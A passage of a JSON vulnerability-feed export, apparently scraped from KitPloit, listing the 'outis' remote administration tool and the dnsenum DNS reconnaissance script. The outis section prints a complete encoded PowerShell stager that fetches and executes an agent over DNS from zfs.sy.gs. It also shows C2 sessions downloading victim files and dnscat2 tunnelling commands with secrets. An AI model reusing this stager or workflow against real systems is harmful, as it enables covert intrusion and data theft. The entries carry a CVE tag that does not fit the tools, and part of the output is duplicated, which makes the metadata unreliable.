"tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-29T20:30:00", "id": "KITPLOIT:1567876964965286721", "href": "http://www.kitploit.com/2021/10/scarce-apache2-framework-for-bug.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-04T08:40:00", "description": "[  ](<https://4.bp.blogspot.com/-Si8yaPUMk6A/WbnIMuc83AI/AAAAAAAAI4Q/G6AlC65nXJYeyTQmiODAwngeO5YUb9psACLcBGAs/s1600/outis.png>)\n\n \n\n\noutis is a custom [ Remote Administration Tool ](<https://www.kitploit.com/search/label/Remote%20Administration%20Tool>) (RAT) or something like that. Think [ Meterpreter ](<https://www.kitploit.com/search/label/Meterpreter>) or Empire-Agent. However, the focus of this tool is neither an exploit [ toolkit ](<https://www.kitploit.com/search/label/Toolkit>) (there are no exploits) nor persistent management of targets. The focus is to communicate between server and target system and to transfer files, share sockets, spawn shells and so on using various methods and platforms. \n\n \n\n\n** On the Name **\n\nThe cyclops Polyphemus in Homer's Odyssey had some issues with name resolution. When he asked for Odysseus' name, the hacker told him it is \"Outis\" meaning \"Nobody\" in ancient Greek. Thus, when Polyphemus later shouted, that Nobody was about to kill him, strangly no help arrived. \n\nMy thanks to Marcel for remembering this marvelous piece of classic tale. \n\n \n\n\n** Dependencies for the Handler **\n\nArchlinux users can install the following packages: \n\n * python3 # includes cmd, tempfile, ... \n * python-progressbar2 \n * python-dnspython \n * python-crypto \n * python-pyopenssl \n * and maybe more... \nIn other distributions the names may differ, for instance, there is a module named crypto and a module named pycrypto. We need the latter. \nAlso, older versions might cause problems: \n\n\n * pyopenssl needs to be version 16.1.0 or newer, check as follows: \n \n \n $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'\n\nYou can set up a python virtual environment quite easily: \n\n \n \n $ virtualenv outis-venv\n $ source ./outis-venv/bin/activate\n (outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl\n\nThis results to the following package list, which seems to work for me: \n\n \n \n $ pip freeze\n appdirs==1.4.3\n asn1crypto==0.22.0\n cffi==1.10.0\n cryptography==1.8.1\n dnspython==1.15.0\n idna==2.5\n packaging==16.8\n progressbar2==3.18.1\n pycparser==2.17\n pycrypto==2.6.1\n pyOpenSSL==16.2.0\n pyparsing==2.2.0\n python-utils==2.1.0\n six==1.10.0\n\n \n** Installation ** \nClone this git with recursive flag to also clone its submodules in the thirdpartytools folder: \n\n \n \n git clone --recursive ...\n\nThe handler runs on Python 3. Install its dependencies and run it. It will generate stagers, agents and everything else for you. \nTo bind low ports without needing root privileges, consider using a capability wrapper. \n \n** Terms ** \n\n\n * ** agent ** : software, that runs on the victim system \n * ** handler ** : software, that parses your commands and leads the agents (usually it runs on your server) \n * ** stager ** : short script that downloads the agent (using the transport module) and runs it \n * ** transport ** : communication channel between stager/agent and handler, e.g. ReverseTCP \n * ** platform ** : victim architecture to use for stager/agent scripts, e.g. PowerShell \n \n** Currently Supported Plattforms ** \n\n\n * PowerShell (partial) \n \n** Currently Supported Transports ** \n\n\n * Reverse TCP \n * DNS (types TXT or A for staging, and types TXT, CNAME, MX, AAAA or A for agent connection) \n \n** Currently Supported Cryptography ** \n\n\n * Agent stages can be encoded (for obfuscation, not for security) using cyclic XOR \n * Agent stages can be authenticated using RSA signatures and pinned certificates \n * Transport connections can be encrypted / authenticated using TLS and pinned certificates \n \n** Currently Supported Commands and Controls ** \n\n\n * ping requests to test the connection (partial) \n * text message format (partial) \n * upload and download of files \n \n** Currently Supported Extras ** \n\n\n * When using DNS transport with stager and powershell, you can stage the tool dnscat2 / dnscat2-powershell from the thirdpartytools directory instead of the default outis agent. Set the platform option AGENTTYPE to DNSCAT2 (will take a while, but uses only DNS to stage) or DNSCAT2DOWNLOADER (tries to download using HTTPS). \n \n** Usage Examples ** \nDownload of a file using staged DNS transport with POWERSHELL platform could look like this: \n\n \n \n $ outis\n outis> set TRANSPORT DNS\n outis> set ZONE zfs.sy.gs\n outis> set AGENTDEBUG TRUE\n outis> info\n [+] Options for the Handler:\n Name Value Required Description \n ----------------- ---------- -------- -----------------------------------------------------------------\n TRANSPORT DNS True Communication way between agent and handler (Options: REVERSETCP,\n DNS)\n CHANNELENCRYPTION TLS True Encryption Protocol in the transport (Options: NONE, TLS)\n PLATFORM POWERSHELL True Platform of agent code (Options: POWERSHELL)\n PROGRESSBAR TRUE True Display a progressbar for uploading / downloading? (only if not \n debugging the relevant module) (Options: TRUE, FALSE)\n \n [+] Options for the TRANSPORT module DNS:\n Name Value Required Description \n --------- ----------- -------- ------------------------------------------------------------------------\n ZONE zfs.sy.gs True DNS Zone for handling requests\n LHOST 0.0.0.0 True Interface IP to listen on\n LPORT 53 True UDP-Port to listen on for DNS server\n DNSTYPE TXT True DNS type to use for the connection (stager only, the agent will \n enumerate all supported types on its own) (Options: TXT, A)\n DNSSERVER False IP address of DNS server to connect for all queries\n \n [+] Options for the PLATFORM module POWERSHELL:\n Name Value Required Description \n -------------------- -------------------------- -------- ----------------------------------------------\n STAGED TRUE True Is the communication setup staged or not? \n (Options: TRUE, FALSE)\n STAGEENCODING TRUE True Should we send the staged agent in an encoded \n form (obscurity, not for security!) (Options: \n TRUE, FALSE)\n STAGEAUTHENTICATION TRUE True Should the stager verify the agent code \n before executing (RSA signature verification \n with certificate pinning) (Options: TRUE, \n FALSE)\n STAGECERTIFICATEFILE $TOOLPATH/data/outis.pem False File path of a PEM with both RSA key and \n certificate to sign and verify staged agent \n with (you can generate a selfsigned cert by \n using the script gencert.sh initially)\n AGENTTYPE DEFAULT True Defines which agent should be used (the \n default outis agent for this plattform, or \n some third party software we support) \n (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER)\n TIMEOUT 9 True Number of seconds to wait for each request \n (currently only supported by DNS stagers)\n RETRIES 2 True Retry each request for this number of times \n (currently only supported by DNS stagers)\n AGENTDEBUG TRUE True Should the agent print and log debug messages \n (Options: TRUE, FALSE)\n outis> generatestager\n [+] Use the following stager code:\n powershell.exe -Enc JAByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAYQA9ACIAIgA7ACQAdAA9ADAAOwBmAG8AcgAoACQAaQA9ADAAOwA7\n ACQAaQArACsAKQB7ACQAYwA9ACgAWwBzAHQAcgBpAG4AZwBdACgASQBFAFgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AdAB5AHAAZQA9AFQAWA\n BUACAALQB0AGkAbQBlAG8AdQB0AD0AOQAgAHMAJAAoACQAaQApAHIAJAAoACQAcgApAC4AegBmAHMALgBzAHkALgBnAHMALgAgACIAKQApAC4A\n UwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQA7AGkAZgAoACEAJABjACkAewBpAGYAKAAkAHQAKwArAC0AbAB0ADIAKQB7ACQAaQAtAC0AOwBjAG\n 8AbgB0AGkAbgB1AGUAOwB9AGIAcgBlAGEAawA7AH0AJAB0AD0AMAA7ACQAYQArAD0AJABjADsAfQAkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6\n ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQApADsAJABiAD0AJABhAC4ATABlAG4AZwB0AGgAOwAkAGYAcAA9ACIAWA\n B4AEkAMgArAGUAQgBoAGUAUgBMAFMATQBuAHIAVQBNAFgAbgBnAHIARABTAGQATwAyAGQAOAAwAGMAZAB2AHcAcwBKAGMAYwBGAEIAbgAvAGYA\n LwB3AEoATwBpAEIAVAA4AGIATwA2AHAAZgBXAFgAdwBwAEUATwBQAFAAUgBsAFAAdgBnAE8AbgBlAGcAYwBpAE8AYgBPAGEAZABOAFAAVQBxAH\n AAZgBRAD0APQAiADsAJABpAD0AMAA7ACQAYQA9ACQAYQB8ACUAewAkAF8ALQBiAFgAbwByACQAZgBwAFsAJABpACsAKwAlACQAZgBwAC4ATABl\n AG4AZwB0AGgAXQB9ADsAJABwAGsAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAwACwANwA1ADUAKQA7ACQAcw\n BpAGcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAA3ADUANQAsADYAOAA0ACkAOwAkAHMAPQBOAGUAdwAtAE8A\n YgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAxADQAMwA5ACwAKAAkAGIALQAxADQAMwA5ACkAKQA7ACQAcwBoAGEAPQBOAGUAdwAtAE\n 8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQA1ADEAMgBNAGEAbgBhAGcAZQBk\n ADsAaQBmACgAQAAoAEMAbwBtAHAAYQByAGUALQBPAGIAagBlAGMAdAAgACQAcwBoAGEALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAHAAaw\n AuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAKQAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIA\n aQBuAGcAKAAkAGYAcAApACkAIAAtAFMAeQBuAGMAVwBpAG4AZABvAHcAIAAwACkALgBMAGUAbgBnAHQAaAAgAC0AbgBlACAAMAApAHsAIgBFAF\n IAUgBPAFIAMQAiADsARQB4AGkAdAAoADEAKQB9ADsAJAB4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5\n AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAOwAkAHgALgBGAHIAbw\n BtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAGsAKQA7AGkAZgAoAC0ATgBvAHQAIAAkAHgALgBWAGUAcgBpAGYAeQBEAGEAdABhACgAJABzAC4A\n VABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAsACIAUwBIAEEANQAxADIAIgAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG\n UANgA0AFMAdAByAGkAbgBnACgAJABzAGkAZwApACkAKQB7ACIARQBSAFIATwBSADIAIgA7AEUAeABpAHQAKAAyACkAfQA7ACIARwBPAEEARwBF\n AE4AVAAiADsASQBFAFgAIAAkAHMAOwA=\n outis> run\n [+] DNS listening on 0.0.0.0:53\n [+] Sending staged agent (34332 bytes)...\n 100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16\n [+] Staging done\n [+] Waiting for connection and TLS handshake...\n [+] Initial connection with new agent started\n [+] Upgrade to TLS done\n outis session> [+] AGENT: Hello from Agent\n \n outis session> download C:\\testfile.txt /tmp/out.txt\n [+] initiating download of remote file C:\\testfile.txt to local file /tmp/out.txt\n [+] agent reports a size of 3295 bytes for channel 1\n 100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00\n [+] wrote 3295 bytes to file /tmp/out.txt\n outis session> exit\n Do you really want to exit the session and close the connection [y/N]? y\n outis> exit\n\nOr maybe we want to use dnscat2 for the real deal and just use outis to stage it: \n\n \n \n $ outis outis> set TRANSPORT DNS outis> set AGENTTYPE DNSCAT2 outis> set ZONE zfs.sy.gs outis> run [+] DNS listening on 0.0.0.0:53 [+] Sending staged agent (406569 bytes)... 100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17 [+] Staging done [+] Starting dnscat2 to handle the real connection New window created: 0 New window created: crypto-debug Welcome to dnscat2! Some documentation may be out of date. auto_attach => false history_size (for new windows) => 1000 Security policy changed: All connections must be encrypted and authenticated New window created: dns1 Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = zfs.sy.gs]... Assuming you have an authoritative DNS server, you can run the client anywhere with the following (--secret is optional): ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs To talk directly to the server without a domain name, run: ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== Of course, you have to figure out <server> yourself! Clients will connect directly on UDP port 53. dnscat2> New window created: 1 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) dnscat2> sessions 0 :: main [active] crypto-debug :: Debug window for crypto stuff [*] dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*] 1 :: command (feynman-win7) [encrypted and verified] [*] dnscat2> session -i 1 New window created: 1 history_size (session) => 1000 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a command session! That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'. command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt Attempting to download c:/testfile.txt to /tmp/out.txt Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt! command (feynman-win7) 1> exit Input thread is over \n\n \nOr maybe we want to use dnscat2 for the real deal and just use outis to stage it: \n\n \n \n $ outis\n outis> set TRANSPORT DNS\n outis> set AGENTTYPE DNSCAT2\n outis> set ZONE zfs.sy.gs\n outis> run\n [+] DNS listening on 0.0.0.0:53\n [+] Sending staged agent (406569 bytes)...\n 100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17\n [+] Staging done\n [+] Starting dnscat2 to handle the real connection\n \n New window created: 0\n New window created: crypto-debug\n Welcome to dnscat2! Some documentation may be out of date.\n \n auto_attach => false\n history_size (for new windows) => 1000\n Security policy changed: All connections must be encrypted and authenticated\n New window created: dns1\n Starting Dnscat2 DNS server on 0.0.0.0:53\n [domains = zfs.sy.gs]...\n \n Assuming you have an authoritative DNS server, you can run\n the client anywhere with the following (--secret is optional):\n \n ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs\n \n To talk directly to the server without a domain name, run:\n \n ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==\n \n Of course, you have to figure out yourself! Clients\n will connect directly on UDP port 53.\n \n dnscat2> New window created: 1\n Session 1 Security: ENCRYPTED AND VERIFIED!\n (the security depends on the strength of your pre-shared secret!)\n \n dnscat2> sessions\n 0 :: main [active]\n crypto-debug :: Debug window for crypto stuff [*]\n dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*]\n 1 :: command (feynman-win7) [encrypted and verified] [*]\n \n dnscat2> session -i 1\n New window created: 1\n history_size (session) => 1000\n Session 1 Security: ENCRYPTED AND VERIFIED!\n (the security depends on the strength of your pre-shared secret!)\n This is a command session!\n \n That means you can enter a dnscat2 command such as\n 'ping'! For a full list of clients, try 'help'.\n \n command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt\n Attempting to download c:/testfile.txt to /tmp/out.txt\n Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt!\n \n command (feynman-win7) 1> exit\n Input thread is over\n\n \n** Inspirations ** \nThis project was inspired by (and shamelessly stole part of its code from): \n\n\n * Empire: \n\n * [ https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py ](<https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py>) \u2014 generate_launcher uses a HTTP(S) stager \n * [ https://github.com/adaptivethreat/Empire/tree/master/data/agent ](<https://github.com/adaptivethreat/Empire/tree/master/data/agent>) \u2014 stager (step two after initial launcher) and agent (step three) \n * [ https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py ](<https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py>) \u2014 [ powershell ](<https://www.kitploit.com/search/label/PowerShell>) script generation and stipping \n * Metasploit: \n\n * [ https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb ](<https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb>) \u2014 CmdStager for bourne, ... \n * ReflectiveDLLInjection: \n\n * [ https://github.com/stephenfewer/ReflectiveDLLInjection ](<https://github.com/stephenfewer/ReflectiveDLLInjection>)\n * p0wnedShell: \n\n * [ https://github.com/Cn33liz/p0wnedShell ](<https://github.com/Cn33liz/p0wnedShell>) \u2014 some ideas for AMSI evation for future use \n * dnscat2: \n\n * [ https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md ](<https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md>) \u2014 ideas on protocol design over DNS \n * [ https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1 ](<https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1>) \u2014 [ powershell ](<https://www.kitploit.com/search/label/PowerShell>) version of the dnscat2 agent \n * dnsftp \n\n * [ https://github.com/breenmachine/dnsftp ](<https://github.com/breenmachine/dnsftp>) \u2014 short script parts for stagers via DNS \n \n** Disclaimer ** \nUse at your own risk. Do not use without full consent of everyone involved. For educational purposes only. \n \n \n\n\n** [ Download outis ](<https://github.com/SySS-Research/outis>) **\n", "cvss3": {}, "published": "2017-09-19T14:00:04", "type": "kitploit", "title": "outis - Custom Remote Administration Tool (RAT)", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2017-09-19T14:00:04", "id": "KITPLOIT:4143386305519508041", "href": "http://www.kitploit.com/2017/09/outis-custom-remote-administration-tool.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-04T00:40:05", "description": "[  ](<https://4.bp.blogspot.com/-1cOrjpBW8Xo/Wbmy7my3jKI/AAAAAAAAI30/IoI6B5uB3iopNv8fwFtr6k437MI8OVaaQCLcBGAs/s1600/dnsenum.png>)\n\n \n\n\nMultithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. \n\n\n \n\n\n** OPERATIONS: ** \n\n\n * Get the host\u2019s addresse (A record). \n * Get the namservers (threaded). \n * Get the MX record (threaded). \n * Perform axfr queries on nameservers and get BIND VERSION (threaded). \n * Get extra names and subdomains via google scraping (google query = \u201callinurl: -www site:domain\u201d). \n * Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded). \n * Calculate C class domain network ranges and perform whois queries on them (threaded). \n * Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded). \n * Write to domain_ips.txt file ip-blocks. \n\n \n\n\n** PREREQUISITES: ** \n \nModules that are included in perl 5.10.0: Getopt::Long IO::File Thread::Queue \nOther Necessary modules: Must have: Net::IP Net::DNS Net::Netmask Optional: Net::Whois::IP HTML::Parser WWW::Mechanize XML::Writer \nTo install a module, simply run (as root): \n\n \n \n sudo apt-get install perl-doc\n sudo perl -MCPAN -e shell\n cpan[1]> install XML::Writer\n cpan[2]> install Net::Netmask\n cpan[3]> install String::Random\n\n \nPerl ithreads support: perl version must be compliled with ithreads support. threads threads::shared \nOPTIONS: run \"perldoc dnsenum.pl\". \n \n** USAGE: ** \n\n \n \n [email\u00a0protected]:~# perl dnsenum.pl -h\n dnsenum.pl VERSION:1.2.4\n Usage: dnsenum.pl [Options] \n [Options]:\n Note: the brute force -f switch is obligatory.\n GENERAL OPTIONS:\n --dnsserver \n Use this DNS server for A, NS and MX queries.\n --enum Shortcut option equivalent to --threads 5 -s 15 -w.\n -h, --help Print this help message.\n --noreverse Skip the reverse lookup operations.\n --private Show and save private ips at the end of the file domain_ips.txt.\n --subfile Write all valid subdomains to this file.\n -t, --timeout The tcp and udp timeout values in seconds (default: 10s).\n --threads The number of threads that will perform different queries.\n -v, --verbose Be verbose: show all the progress and all the error messages.\n GOOGLE SCRAPING OPTIONS:\n -p, --pages The number of google search pages to process when scraping names,\n the default is 5 pages, the -s switch must be specified.\n -s, --scrap The maximum number of subdomains that will be scraped from Google (default 15).\n BRUTE FORCE OPTIONS:\n -f, --file Read subdomains from this file to perform brute force.\n -u, --update \n Update the file specified with the -f switch with valid subdomains.\n a (all) Update using all results.\n g Update using only google scraping results.\n r Update using only reverse lookup results.\n z Update using only zonetransfer results.\n -r, --recursion Recursion on subdomains, brute force all discovred subdomains that have an NS record.\n WHOIS NETRANGE OPTIONS:\n -d, --delay The maximum value of seconds to wait between whois queries, the value is defined randomly, default: 3s.\n -w, --whois Perform the whois queries on c class network ranges.\n **Warning**: this can generate very large netranges and it will take lot of time to performe reverse lookups.\n REVERSE LOOKUP OPTIONS:\n -e, --exclude \n Exclude PTR records that match the regexp expression from reverse lookup results, useful on invalid hostnames.\n OUTPUT OPTIONS:\n -o --output Output in XML format. Can be imported in MagicTree (www.gremwell.com)\n\n \n \n\n\n** [ Download dnsenum ](<https://github.com/fwaeytens/dnsenum>) **\n", "cvss3": {}, "published": "2017-09-18T21:00:23", "type": "kitploit", "title": "dnsenum - Multithreaded perl script to enumerate DNS information", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2017-09-18T21:00:23", "id": "KITPLOIT:4700475362409254459", "href": "http://www.kitploit.com/2017/09/dnsenum-multithreaded-perl-script-to.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}